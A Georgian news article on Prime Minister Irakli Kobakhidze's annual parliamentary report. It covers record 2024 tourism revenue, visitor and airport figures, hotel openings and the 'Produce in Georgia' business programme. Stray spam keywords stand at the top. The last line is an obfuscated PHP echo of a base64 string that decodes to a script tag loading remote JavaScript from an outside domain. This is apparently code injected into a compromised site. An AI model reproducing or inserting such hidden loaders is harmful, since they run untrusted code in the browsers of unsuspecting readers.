gorgia
jaluzi

მნიშვნელოვანია, რომ ტურიზმის სექტორი ვითარდება სწრაფი ტემპით, 2024 წელს დაფიქსირდა რეკორდული მაჩვენებელი შემოსავლების თვალსაზრისით. 4.4 მლრდ დოლარის შემოსავალი მიიღო ტურიზმიდან ჩვენმა ქვეყანამ, - ამის შესახებ საქართველოს პრემიერ-მინისტრმა ირაკლი კობახიძემ პარლამენტში ყოველწლიური მოხსენებით გამოსვლისას განაცხადა.

მთავრობის მეთაურის თქმით, ქვეყანამ საანგარიშო პერიოდში უმასპინძლა 7.4 მლნ საერთაშორისო მოგზაურს, გაიხსნა 70 სასტუმრო 3 300-ზე მეტი ნომრით და, დაახლოებით, 6 700 ადგილით.

„შარშან, ჩვენ ვუმასპინძლეთ 7.4 მლნ საერთაშორისო მოგზაურს, 2024-25 წლებში გაიხსნა 70 სასტუმრო 3 300-ზე მეტი ნომრით და, დაახლოებით, 6 700 ადგილით. 2025-28 წლებში, 300-ზე მეტი სასტუმრო დაგვემატება არსებული გეგმისა და პროექტების შესაბამისად 38 000-ზე მეტი ადგილით. მოსალოდნელი ჯამური ინვესტიცია 2 მლრდ ლარია.

აეროპორტების ნაწილშიც გვქონდა რეკორდული მაჩვენებელი - 7,425,000 მგზავრს მოემსახურა ჩვენი სამი აეროპორტი გასულ წელს, რაც ყველაზე მაღალი მაჩვენებელია დამოუკიდებლობის აღდგენის შემდეგ და დამოუკიდებლობის აღდგენამდეც არ გვქონია ჩვენ არასდროს ასეთი მაჩვენებელი“, - განაცხადა პრემიერმა.

ამასთან, კობახიძემ პარლამენტში ყოველწლიური მოხსენებით გამოსვლისას პროგრამის „აწარმოე საქართველოში“ შესახებაც ისაუბრა.

მისი თქმით, პროგრამის ფარგლებში დაფინანსდა 1 500 მეწარმე სუბიექტი და შეიქმნა 10 ათასზე მეტი სამუშაო ადგილი, საკრედიტო საგარანტიო სქემის სახელმწიფო პროგრამით დაფინანსდა 292 პროექტი, შეიქმნა 3 300-ზე მეტი სამუშაო ადგილი.

როგორც ირაკლი კობახიძემ აღნიშნა, გრძელდება „აწარმოე საქართველოში“ პროგრამის ფარგლებში შესაბამისი ღონისძიებების დაფინანსება, დაფინანსდა 1 500 მეწარმე სუბიექტი საანგარიშო პერიოდის განმავლობაში და შეიქმნა ამ პროგრამის საშუალებით 10 ათასზე მეტი სამუშაო ადგილი.

„ასევე საკრედიტო საგარანტიო სქემის სახელმწიფო პროგრამა ხორციელდება, დაფინანსდა 267 კომპანიის 292 პროექტი, შეიქმნა 3 300-ზე მეტი სამუშაო ადგილი. ინოვაციების და ტექნოლოგიების სფეროში გვაქვს კონკრეტული პროექტები, რომლებიც ფინანსდება, გვაქვს საგადასახადო შეღავათების სისტემა, რომელიც მოქმედებს, გვაქვს სტარტაპების მომზადების დაფინანსების სისტემა, რომლითაც უზრუნველვყოფთ მსმენელების გადამზადებას. ხელოვნური ინტელექტი, ფაგები და აგროტექნოლოგიები, ამ მიმართულებითაც იდგმება ნაბიჯები. შესაბამისად, გვაქვს მრავალი პროგრამა, ეს არის მხოლოდ რამდენიმე სამაგალითო ჩამონათვალი, დეტალური ინფორმაცია წარმოდგენილია სამთავრობო ანგარიშში. არის არაერთი პროგრამა, რომელიც დამატებით ხელს უწყობს ეკონომიკური ზრდის სტიმულირებას, კონკრეტული პროექტების დაფინანსების საფუძველზე“, - განაცხადა ირაკლი კობახიძემ.

136
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");